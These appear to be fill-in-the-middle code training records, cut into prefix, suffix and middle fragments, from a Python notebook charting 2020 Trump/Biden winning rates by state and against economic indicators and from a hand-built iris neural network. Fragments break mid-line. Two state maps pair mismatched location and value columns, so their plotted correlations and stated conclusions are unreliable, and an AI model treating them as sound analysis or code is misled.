colorscale = 'Reds',
colorbar_title = "Winning Rate",))
fig.update_layout(
title_text = 'Trump winning rate by state:'+ str(date.date()),
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * From the above graphs, we can see the Trump's winning rates by state and month
# * The winning rates are particularly low in Northeast and West coast while higher in the middle states
# ### 3.2 States with the Largest Uncertainties
# In[15]:
pst_cat = pst[['date','winstate_inc','code']]
datevar = pst_cat['date'].drop_duplicates()[0:-1:30]
for date in datevar:
pst_sub = pst_cat[pst_cat['date'] == date]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = -abs(pst_sub['winstate_inc']-0.5), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Uncertainty Level",))
fig.update_layout(
title_text = 'Uncertainties by state:'+ str(date.date()),
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * This graphs show the uncertainty levels of Trump winning of each states by month
# * OH, GA, and IA are the three states that Trump's winning rate is close to 50%
# ### 3.3 Correlation between Trump's State level Winning Rate with National level Winning Rate
# In[16]:
pst_cat = pst_cat.set_index(['code','date'])
pst_cat = pst_cat.sort_values(by = ['code','date'])
pst_diff = pst_cat.diff().dropna()
pst_diff = pst_diff.reset_index()
# In[17]:
pst_pnt_diff_merge = pst_diff.merge(pnt_diff, on='date')
pst_pnt_merge = pst_cat.reset_index().merge(pnt_win, on='date')
# In[18]:
pst_pnt_corr = pst_pnt_merge.groupby('code')['winstate_inc','Trump'].corr().reset_index()
# In[19]:
pst_pnt_corr = pst_pnt_corr[pst_pnt_corr['level_1']=='Trump'][['code','winstate_inc']]
# In[20]:
fig = go.Figure(data=go.Choropleth(
locations=pst_pnt_corr['code'], # Spatial coordinates
z = pst_pnt_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with State Winning Rate",))
fig.update_layout(
title_text = "Correlation between Trump's State level Winning Rate with National level Winning Rate",
geo_scope='usa', # limite map scope to USA
)
fig.show()
| # * The correlation is the lowest in KY: Trump is more likely to win the national election if he lost in KY.
# ## 4. Comovement between Trump's Winning Rate and Economic Indicators
# In[21]:
ei = pd.read_csv('economic_index.csv')
ei['date'] = ei['modeldate'].apply(lambda x: datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])) )
# In[22]:
idx1 = ei[ei['indicator']=='S&P 500'].set_index('date').rename(columns = {'current_zscore':'S&P 500'})['S&P 500']
idx2 = ei[ei['indicator']=='Personal consumption expenditures'].set_index('date').rename(columns = {'current_zscore':'Personal consumption expenditures'})['Personal consumption expenditures']
idx3 = ei[ei['indicator']=='Industrial production'].set_index('date').rename(columns = {'current_zscore':'Industrial production'})['Industrial production']
idx4 = ei[ei['indicator']=='Nonfarm payrolls'].set_index('date').rename(columns = {'current_zscore':'Nonfarm payrolls'})['Nonfarm payrolls']
idx5 = ei[ei['indicator']=='Consumer price index'].set_index('date').rename(columns = {'current_zscore':'Consumer price index'})['Consumer price index']
idx6 = ei[ei['indicator']=='Real disposable personal income'].set_index('date').rename(columns = {'current_zscore':'Real disposable personal income'})['Real disposable personal income']
idx = ei[ei['indicator']=='Average of all six indicators'].set_index('date').rename(columns = {'current_zscore':'Average of all six indicators'})['Average of all six indicators']
idx_merge = pd.merge(idx1,idx2,on='date').merge(idx3, on='date').merge(idx4, on='date').merge(idx5, on='date').merge(idx6, on='date').merge(idx, on='date')
idx_merge = idx_merge.reset_index()
# ### 4.1 National Level Comovement
# In[23]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
ax.scatter(df['date'],
df['Trump'],
c= -df['Trump'])
ax.plot(df['date'],
df['Trump'],
color='blue')
ax2=ax.twinx()
df = idx_merge
ax2.plot(df['date'],
df['S&P 500'],
color='green')
ax2.scatter(df['date'],
df['S&P 500'],
c= -df['S&P 500'])
# Set title and labels for axes
ax.set_ylabel("S&P 500", color="green")
ax2.set_ylabel("Trump winning rate", color="blue")
ax.set(title = "Trump winning rate vs. S&P 500")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * There are some comovements between Trump's winning rate and S&P 500 before the end of September
# * The correlation between Trump's winning rate and S&P 500 becomes negative since around 9/29/2020
# In[24]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
ax.scatter(df['date'],
df['Trump'],
c= -df['Trump'])
ax.plot(df['date'],
df['Trump'],
color='blue')
ax2=ax.twinx()
df = idx_merge
ax2.plot(df['date'],
df['Average of all six indicators'],
color='green')
ax2.scatter(df['date'],
df['Average of all six indicators'],
c= -df['Average of all six indicators'])
# Set title and labels for axes
ax.set_ylabel("Average of all six indicators", color="green")
ax2.set_ylabel("Trump winning rate", color="blue")
ax.set(title = "Trump winning rate vs. Average of all six indicators")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * There are some comovements between Trump's winning rate and average of indicators before the mid August
#
# ### 4.2 Comovement between Trump's State Level Winning Rate and Economic Indicators
# In[25]:
pst_merge = pst_cat.reset_index().merge(pnt_win, on = 'date').merge(idx1, on ='date')
pst_corr = pst_merge.groupby('code')['winstate_inc','S&P 500'].corr().reset_index()
pst_corr = pst_corr[pst_corr['level_1']=='S&P 500'][['code','winstate_inc']]
# In[26]:
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with S&P 500",))
fig.update_layout(
title_text = 'Trump winning rate correlation with stock market',
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The states whose winning rates are highly positively correlated with S&P 500 are: OH, WI, OR...
# * The states whose winning rates are highly negatively correlated with S&P 500 are: NM, OK, KS...
# * States such as MD are not likely to be affected by stock market
# In[27]:
pst_merge = pst_cat.reset_index().merge(pnt_win, on = 'date').merge(idx, on ='date')
pst_corr = pst_merge.groupby('code')['winstate_inc','Average of all six indicators'].corr().reset_index()
pst_corr = pst_corr[pst_corr['level_1']=='Average of all six indicators'][['code','winstate_inc']]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with Average of all six indicators",))
fig.update_layout(
title_text = 'Trump winning rate correlation with economics indicators',
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The states whose winning rates are highly positively correlated with economics indicators are: OR, OH, CT...
# * The states whose winning rates are highly negatively correlated with economics indicators: NM, OK, KS...
# * States such as NE, VT, WY are not likely to be affected by economics indicators | # * The correlation is the highest in PA, UT, CO: If Trump wins these three states, he is likely to win the national election. | random_line_split |
Data visualization_Trump Winning Rate.py | #!/usr/bin/env python
# coding: utf-8
# # Data Visualization: Trump's Winning Rate
# This report provides detailed facts about Trump's Winning Rate and its correlation between economics indicators, both at national level and at state level
# In[5]:
import pandas as pd
import datetime
import time
import matplotlib.pyplot as plt
import matplotlib.dates as dt
import matplotlib.ticker as ticker
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
from matplotlib import cm
import numpy as np
import math
# ## 1. Trump vs. Biden Winning Rate by Time
# In[6]:
pnt = pd.read_csv('presidential_national_toplines_2020.csv')
pnt['date'] = pnt['modeldate'].apply(lambda x: datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])))
date = pnt['date']
y1 = pnt['ecwin_inc']
y2 = pnt['ecwin_chal']
pnt_win=pd.DataFrame({'date': date, 'Trump': y1, 'Biden': y2})
# In[7]:
import seaborn as sns
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
y = [df['Trump'].tolist(),df['Biden']-df['Trump']]
pal = sns.color_palette("Set1")
ax.stackplot(df['date'], y ,labels=['Trump','Biden'], colors=pal, alpha=0.4 )
ax.legend(loc='upper left')
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# In[8]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
# Add x-axis and y-axis
ax.plot(df['date'],df['Trump'], color='red', label = 'Trump Winning Rate')
ax.plot(df['date'],df['Biden'],color='darkblue', label = 'Biden Winning Rate', linestyle='dashed')
# Set title and labels for axes
ax.set(xlabel="date",
ylabel="Winning rate of the election 2020",
title="Trump vs. Biden")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.legend()
plt.show()
# * Trump's winning rate has a declining trend and the winning rate gap between Biden and Trump is enlarging since the beginning of September
# ## 2. Trump's Winning Rate Changes over Time
# In[9]:
pnt_diff = pnt_win.set_index('date').sort_values(by='date').diff().dropna().reset_index()
# In[10]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_diff
# Add x-axis and y-axis
ax.scatter(df['date'],df['Trump'],c= df['Trump'].apply(lambda x: math.floor(-10000*x)))
ax.plot(df['date'], df['Trump'],color='grey')
ax.plot(df['date'],[0]*132,color='lightblue')
# Set title and labels for axes
ax.set(xlabel="date", ylabel="Daily changes in winning rate",title="Variation in winning rate: Trump")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * Trump's winning rate fluctuate a lot from June to August: There are large jumps and drops.
# * However, since the beginning of September, the fluctuation is smaller and the winning rate drops for most of the times.
# ## 3. Trump's Winning Rate at State Level
# In[11]:
us_state_abbrev = {'Alabama': 'AL', 'Alaska': 'AK','American Samoa': 'AS','Arizona': 'AZ', 'Arkansas': 'AR',
'California': 'CA','Colorado': 'CO','Connecticut': 'CT', 'Delaware': 'DE','District of Columbia': 'DC','Florida': 'FL',
'Georgia': 'GA','Guam': 'GU','Hawaii': 'HI','Idaho': 'ID','Illinois': 'IL','Indiana': 'IN','Iowa': 'IA','Kansas': 'KS','Kentucky': 'KY','Louisiana': 'LA',
'Maine': 'ME','Maryland': 'MD','Massachusetts': 'MA','Michigan': 'MI','Minnesota': 'MN','Mississippi': 'MS','Missouri': 'MO',
'Montana': 'MT','Nebraska': 'NE','Nevada': 'NV','New Hampshire': 'NH','New Jersey': 'NJ','New Mexico': 'NM','New York': 'NY',
'North Carolina': 'NC','North Dakota': 'ND','Northern Mariana Islands':'MP','Ohio': 'OH','Oklahoma': 'OK','Oregon': 'OR','Pennsylvania': 'PA',
'Puerto Rico': 'PR','Rhode Island': 'RI','South Carolina': 'SC','South Dakota': 'SD', 'Tennessee': 'TN','Texas': 'TX','Utah': 'UT','Vermont': 'VT','Virgin Islands': 'VI','Virginia': 'VA',
'Washington': 'WA','West Virginia': 'WV','Wisconsin': 'WI', 'Wyoming': 'WY'
}
# In[12]:
pst = pd.read_csv('presidential_state_toplines_2020.csv')
pst['date'] = pst['modeldate'].apply(lambda x:datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])))
pst['code'] = pst['state'].apply(lambda x: 'no' if '-' in x else us_state_abbrev[x])
pst = pst[pst['code']!='no']
# ### 3.1 Winning Rate by State-Month
# In[14]:
import plotly.graph_objects as go
pst_cat = pst[['date','winstate_inc','code']]
datevar = pst_cat['date'].drop_duplicates()[0:-1:30]
for date in datevar:
|
# * From the above graphs, we can see the Trump's winning rates by state and month
# * The winning rates are particularly low in Northeast and West coast while higher in the middle states
# ### 3.2 States with the Largest Uncertainties
# In[15]:
pst_cat = pst[['date','winstate_inc','code']]
datevar = pst_cat['date'].drop_duplicates()[0:-1:30]
for date in datevar:
pst_sub = pst_cat[pst_cat['date'] == date]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = -abs(pst_sub['winstate_inc']-0.5), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Uncertainty Level",))
fig.update_layout(
title_text = 'Uncertainties by state:'+ str(date.date()),
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * This graphs show the uncertainty levels of Trump winning of each states by month
# * OH, GA, and IA are the three states that Trump's winning rate is close to 50%
# ### 3.3 Correlation between Trump's State level Winning Rate with National level Winning Rate
# In[16]:
pst_cat = pst_cat.set_index(['code','date'])
pst_cat = pst_cat.sort_values(by = ['code','date'])
pst_diff = pst_cat.diff().dropna()
pst_diff = pst_diff.reset_index()
# In[17]:
pst_pnt_diff_merge = pst_diff.merge(pnt_diff, on='date')
pst_pnt_merge = pst_cat.reset_index().merge(pnt_win, on='date')
# In[18]:
pst_pnt_corr = pst_pnt_merge.groupby('code')['winstate_inc','Trump'].corr().reset_index()
# In[19]:
pst_pnt_corr = pst_pnt_corr[pst_pnt_corr['level_1']=='Trump'][['code','winstate_inc']]
# In[20]:
fig = go.Figure(data=go.Choropleth(
locations=pst_pnt_corr['code'], # Spatial coordinates
z = pst_pnt_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with State Winning Rate",))
fig.update_layout(
title_text = "Correlation between Trump's State level Winning Rate with National level Winning Rate",
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The correlation is the highest in PA, UT, CO: If Trump wins these three states, he is likely to win the national election.
# * The correlation is the lowest in KY: Trump is more likely to win the national election if he lost in KY.
# ## 4. Comovement between Trump's Winning Rate and Economic Indicators
# In[21]:
ei = pd.read_csv('economic_index.csv')
ei['date'] = ei['modeldate'].apply(lambda x: datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])) )
# In[22]:
idx1 = ei[ei['indicator']=='S&P 500'].set_index('date').rename(columns = {'current_zscore':'S&P 500'})['S&P 500']
idx2 = ei[ei['indicator']=='Personal consumption expenditures'].set_index('date').rename(columns = {'current_zscore':'Personal consumption expenditures'})['Personal consumption expenditures']
idx3 = ei[ei['indicator']=='Industrial production'].set_index('date').rename(columns = {'current_zscore':'Industrial production'})['Industrial production']
idx4 = ei[ei['indicator']=='Nonfarm payrolls'].set_index('date').rename(columns = {'current_zscore':'Nonfarm payrolls'})['Nonfarm payrolls']
idx5 = ei[ei['indicator']=='Consumer price index'].set_index('date').rename(columns = {'current_zscore':'Consumer price index'})['Consumer price index']
idx6 = ei[ei['indicator']=='Real disposable personal income'].set_index('date').rename(columns = {'current_zscore':'Real disposable personal income'})['Real disposable personal income']
idx = ei[ei['indicator']=='Average of all six indicators'].set_index('date').rename(columns = {'current_zscore':'Average of all six indicators'})['Average of all six indicators']
idx_merge = pd.merge(idx1,idx2,on='date').merge(idx3, on='date').merge(idx4, on='date').merge(idx5, on='date').merge(idx6, on='date').merge(idx, on='date')
idx_merge = idx_merge.reset_index()
# ### 4.1 National Level Comovement
# In[23]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
ax.scatter(df['date'],
df['Trump'],
c= -df['Trump'])
ax.plot(df['date'],
df['Trump'],
color='blue')
ax2=ax.twinx()
df = idx_merge
ax2.plot(df['date'],
df['S&P 500'],
color='green')
ax2.scatter(df['date'],
df['S&P 500'],
c= -df['S&P 500'])
# Set title and labels for axes
ax.set_ylabel("S&P 500", color="green")
ax2.set_ylabel("Trump winning rate", color="blue")
ax.set(title = "Trump winning rate vs. S&P 500")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * There are some comovements between Trump's winning rate and S&P 500 before the end of September
# * The correlation between Trump's winning rate and S&P 500 becomes negative since around 9/29/2020
# In[24]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
ax.scatter(df['date'],
df['Trump'],
c= -df['Trump'])
ax.plot(df['date'],
df['Trump'],
color='blue')
ax2=ax.twinx()
df = idx_merge
ax2.plot(df['date'],
df['Average of all six indicators'],
color='green')
ax2.scatter(df['date'],
df['Average of all six indicators'],
c= -df['Average of all six indicators'])
# Set title and labels for axes
ax.set_ylabel("Average of all six indicators", color="green")
ax2.set_ylabel("Trump winning rate", color="blue")
ax.set(title = "Trump winning rate vs. Average of all six indicators")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * There are some comovements between Trump's winning rate and average of indicators before the mid August
#
# ### 4.2 Comovement between Trump's State Level Winning Rate and Economic Indicators
# In[25]:
pst_merge = pst_cat.reset_index().merge(pnt_win, on = 'date').merge(idx1, on ='date')
pst_corr = pst_merge.groupby('code')['winstate_inc','S&P 500'].corr().reset_index()
pst_corr = pst_corr[pst_corr['level_1']=='S&P 500'][['code','winstate_inc']]
# In[26]:
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with S&P 500",))
fig.update_layout(
title_text = 'Trump winning rate correlation with stock market',
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The states whose winning rates are highly positively correlated with S&P 500 are: OH, WI, OR...
# * The states whose winning rates are highly negatively correlated with S&P 500 are: NM, OK, KS...
# * States such as MD are not likely to be affected by stock market
# In[27]:
pst_merge = pst_cat.reset_index().merge(pnt_win, on = 'date').merge(idx, on ='date')
pst_corr = pst_merge.groupby('code')['winstate_inc','Average of all six indicators'].corr().reset_index()
pst_corr = pst_corr[pst_corr['level_1']=='Average of all six indicators'][['code','winstate_inc']]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with Average of all six indicators",))
fig.update_layout(
title_text = 'Trump winning rate correlation with economics indicators',
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The states whose winning rates are highly positively correlated with economics indicators are: OR, OH, CT...
# * The states whose winning rates are highly negatively correlated with economics indicators: NM, OK, KS...
# * States such as NE, VT, WY are not likely to be affected by economics indicators
| pst_sub = pst_cat[pst_cat['date'] == date]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_sub['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Winning Rate",))
fig.update_layout(
title_text = 'Trump winning rate by state:'+ str(date.date()),
geo_scope='usa', # limite map scope to USA
)
fig.show() | conditional_block |
MLP.py | import random
import math
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class NeuralNetwork:
# 3 layer network ----input----hidden----output
LEARNING_RATE = 0.5
# initialize NN
def __init__(self, num_inputs, num_hidden, num_outputs, hidden_layer_weights=None, hidden_layer_bias=None,
output_layer_weights=None, output_layer_bias=None):
self.num_inputs = num_inputs
self.hidden_layer = NeuronLayer(num_hidden, hidden_layer_bias)
self.output_layer = NeuronLayer(num_outputs, output_layer_bias)
self.init_weights_from_inputs_to_hidden_layer_neurons(hidden_layer_weights)
self.init_weights_from_hidden_layer_neurons_to_output_layer_neurons(output_layer_weights)
# self.inspect()
def init_weights_from_inputs_to_hidden_layer_neurons(self, hidden_layer_weights):
weight_num = 0
for h in range(len(self.hidden_layer.neurons)):
for i in range(self.num_inputs): # input layer
if not hidden_layer_weights:
# if no hidden_layer_weight---randomly pick a value
self.hidden_layer.neurons[h].weights.append(random.random())
else:
self.hidden_layer.neurons[h].weights.append(hidden_layer_weights[weight_num])
weight_num += 1
def init_weights_from_hidden_layer_neurons_to_output_layer_neurons(self, output_layer_weights):
weight_num = 0
for o in range(len(self.output_layer.neurons)):
for h in range(len(self.hidden_layer.neurons)): # hidden layer
if not output_layer_weights:
# if no output_layer_weight---randomly pick a value
self.output_layer.neurons[o].weights.append(random.random())
else:
self.output_layer.neurons[o].weights.append(output_layer_weights[weight_num])
weight_num += 1
def inspect(self): # print NN info
print('------')
print('* Inputs: {}'.format(self.num_inputs))
print('------')
print('Hidden Layer')
self.hidden_layer.inspect()
print('------')
print('* Output Layer')
self.output_layer.inspect()
print('------')
def feed_forward(self, inputs): # FP output
hidden_layer_outputs = self.hidden_layer.feed_forward(inputs) # hidden layer output-- to output layer
return self.output_layer.feed_forward(hidden_layer_outputs) # output layer output
def train(self, training_inputs, training_outputs):
self.feed_forward(training_inputs)
# BP
# 1. Output layer deltas Δ
pd_errors_wrt_output_neuron_total_net_input = [0]*len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)): #to every neuron in output layer
# ∂E/∂zⱼ=∂E/∂a*∂a/∂z=cost'(target_output)*sigma'(z)
pd_errors_wrt_output_neuron_total_net_input[o] = self.output_layer.neurons[
o].calculate_pd_error_wrt_total_net_input(training_outputs[o])
# 2. Hidden layer Δ
pd_errors_wrt_hidden_neuron_total_net_input = [0]*len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
# dE/dyⱼ = Σ ∂E/∂zⱼ * ∂z/∂yⱼ = Σ ∂E/∂zⱼ * wᵢⱼ
d_error_wrt_hidden_neuron_output = 0
for o in range(len(self.output_layer.neurons)):
d_error_wrt_hidden_neuron_output += pd_errors_wrt_output_neuron_total_net_input[o]* \
self.output_layer.neurons[o].weights[h]
# ∂E/∂zⱼ = dE/dyⱼ * ∂zⱼ/∂
pd_errors_wrt_hidden_neuron_total_net_input[h] = d_error_wrt_hidden_neuron_output*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_input()
# 3. Update output neuron weights
for o in range(len(self.output_layer.neurons)):
for w_ho in range(len(self.output_layer.neurons[o].weights)):
# ∂Eⱼ/∂wᵢⱼ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢⱼ
pd_error_wrt_weight = pd_errors_wrt_output_neuron_total_net_input[o]*self.output_layer.neurons[
o].calculate_pd_total_net_input_wrt_weight(w_ho)
# Δw = α * ∂Eⱼ/∂wᵢ
self.output_layer.neurons[o].weights[w_ho] -= self.LEARNING_RATE*pd_error_wrt_weight
# 4. Update hidden neuron weights
for h in range(len(self.hidden_layer.neurons)):
for w_ih in range(len(self.hidden_layer.neurons[h].weights)):
# ∂Eⱼ/∂wᵢ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢ
pd_error_wrt_weight = pd_errors_wrt_hidden_neuron_total_net_input[h]*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_weight(w_ih)
# Δw = α * ∂Eⱼ/∂wᵢ
self.hidden_layer.neurons[h].weights[w_ih] -= self.LEARNING_RATE*pd_error_wrt_weight
def calculate_total_error(self, training_sets):
# calculate error
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
result = self.feed_forward(training_inputs)
# print('result is %s' % result)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
# total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuronLayer:
# layer
def __init__(self, num_neurons, bias):
# neuron in a layer have the same bias
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(num_neurons):
self.neurons.append(Neuron(self.bias))
# print layer info
self.inspect()
def inspect(self):
# print layer info
print('Neurons:', len(self.neurons))
for n in range(len(self.neurons)):
print(' Neuron', n)
for w in range(len(self.neurons[n].weights)):
print(' Weight:', self.neurons[n].weights[w])
print(' Bias:', self.bias)
def feed_forward(self, inputs):
# feed forward output, every neuron output (using the sigmoid)
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
def get_outputs(self):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
class Neuron:
# single neuron
def __init__(self, bias):
self.bias = bias
self.weights = []
def calculate_output(self, inputs): #single neuron output
self.input | sh(self.calculate_total_net_input())
return self.output
def calculate_total_net_input(self):
# z=W(n)x+b
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i]*self.weights[i]
return total + self.bias
# Use the sigmoid function as the activition function, which is the definition of the sigmoid function.
def squash(self, total_net_input):
return 1/(1 + math.exp(-total_net_input))
# δ = ∂E/∂zⱼ = ∂E/∂yⱼ * dyⱼ/dzⱼ 关键key
def calculate_pd_error_wrt_total_net_input(self, target_output):
return self.calculate_pd_error_wrt_output(target_output)*self.calculate_pd_total_net_input_wrt_input()
# The error for each neuron is calculated by the Mean Square Error method:
def calculate_error(self, target_output):
return 0.5*(target_output - self.output) ** 2
# = ∂E/∂yⱼ = -(tⱼ - yⱼ)
def calculate_pd_error_wrt_output(self, target_output):
return -(target_output - self.output)
# dyⱼ/dzⱼ = yⱼ * (1 - yⱼ)这是sigmoid函数的导数表现形式.
def calculate_pd_total_net_input_wrt_input(self):
return self.output*(1 - self.output)
# = ∂zⱼ/∂wᵢ = some constant + 1 * xᵢw₁^(1-0) + some constant ... = xᵢ
def calculate_pd_total_net_input_wrt_weight(self, index):
return self.inputs[index]
def load_data_set():
"""
read in data 5D add all 1s column
"""
iris = pd.read_csv('/Users/michael/Codes/bitbucket/cs584-s18-kaiyue-ma/AS2/data/iris.csv', encoding="gbk")
iris = iris.sample(frac=1.0)
dummy = pd.get_dummies(iris['Species'])
iris = pd.concat([iris, dummy], axis=1)
org_x = np.array(iris.iloc[:, 1:5])
# org_y = np.array(iris['setosa']).reshape(len(iris), 1)
org_y = np.array(iris['setosa'])
# data_arr, test_arr, label_arr, test_label = train_test_split(org_x, org_y, test_size=0.2, random_state=42)
#
# data_arr = data_arr.tolist()
# test_arr = test_arr.tolist()
# label_arr = label_arr.tolist()
# test_label = test_label.tolist()
#
# data_arr = np.dot(data_arr)
# one = np.ones(len(data_arr))
# data_arr = np.column_stack(one , data_arr)
# data_arr = data_arr.tolist()
#
# test_arr = np.dot(test_arr)
# one = np.ones(len(test_arr))
# test_arr = np.column_stack(one, test_arr)
# test_arr = test_arr.tolist()
x = org_x.tolist()
y = org_y.tolist()
x = np.mat(x)
one = np.ones(len(x))
x = np.column_stack((one, x))
x = x.tolist()
# print(data_arr)
# x1_2 = data_arr[:, 1]
# print(x1_2)
# print('.....')
# print(label_arr)
# return data_arr, test_arr, label_arr, test_label
return x, y
# training_sets = [
# [[0, 0, 0], [0]],
# [[0, 0, 1], [0]],
# [[0, 1, 0], [0]],
# [[1, 0, 0], [0]],
# [[0, 1, 1], [1]],
# [[1, 0, 1], [1]],
# [[1, 1, 0], [1]],
# [[1, 1, 1], [1]],
# ]
# training_sets = [
# [[0, 0], [0]],
# [[0, 1], [1]],
# [[1, 0], [1]],
# [[1, 1], [0]]
# ]
def data_trans():
train = []
x, y = load_data_set() # load dataset
# separate data into data and label
for idx,feature in enumerate(x):
train.append([feature,[y[idx]]])
print('done')
# separate data randomly into test and train
# xtrain, xtest, ytrain, ytest = load_data_set()
trainingset = random.sample(train,105)
testset = [f for f in train if f not in trainingset]
return trainingset , testset ,train
def test():
trainingset, testset, train = data_trans()
epoch = 80
nn = NeuralNetwork(len(train[0][0]), 10, len(train[0][1]))
for i in range(epoch):
for idx , trainfeatures in enumerate(trainingset):
randomtuple = random.choice(train)
training_inputs, training_outputs = randomtuple[0],randomtuple[1]
nn.train(training_inputs, training_outputs)
# print('epoch %d:, step:%d----error:%f'%(i, idx, nn.calculate_total_error([trainfeatures])))
# print(i, nn.calculate_total_error(train))
totaltesterror=0
for idx, testfeature in enumerate(testset):
singlerror = nn.calculate_total_error([testfeature])
# print('test error%f'%singlerror)
totaltesterror+=singlerror
print('epoch:%d, test error %f'%(i, totaltesterror/(idx+1)))
if __name__=="__main__":
test() | s = inputs
self.output = self.squa | identifier_body |
MLP.py | import random
import math
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class NeuralNetwork:
# 3 layer network ----input----hidden----output
LEARNING_RATE = 0.5
# initialize NN
def __init__(self, num_inputs, num_hidden, num_outputs, hidden_layer_weights=None, hidden_layer_bias=None,
output_layer_weights=None, output_layer_bias=None):
self.num_inputs = num_inputs
self.hidden_layer = NeuronLayer(num_hidden, hidden_layer_bias)
self.output_layer = NeuronLayer(num_outputs, output_layer_bias)
self.init_weights_from_inputs_to_hidden_layer_neurons(hidden_layer_weights)
self.init_weights_from_hidden_layer_neurons_to_output_layer_neurons(output_layer_weights)
# self.inspect()
def init_weights_from_inputs_to_hidden_layer_neurons(self, hidden_layer_weights):
weight_num = 0
for h in range(len(self.hidden_layer.neurons)):
for i in range(self.num_inputs): # input layer
if not hidden_layer_weights:
# if no hidden_layer_weight---randomly pick a value
self.hidden_layer.neurons[h].weights.append(random.random())
else:
self.hidden_layer.neurons[h].weights.append(hidden_layer_weights[weight_num])
weight_num += 1
def | (self, output_layer_weights):
weight_num = 0
for o in range(len(self.output_layer.neurons)):
for h in range(len(self.hidden_layer.neurons)): # hidden layer
if not output_layer_weights:
# if no output_layer_weight---randomly pick a value
self.output_layer.neurons[o].weights.append(random.random())
else:
self.output_layer.neurons[o].weights.append(output_layer_weights[weight_num])
weight_num += 1
def inspect(self): # print NN info
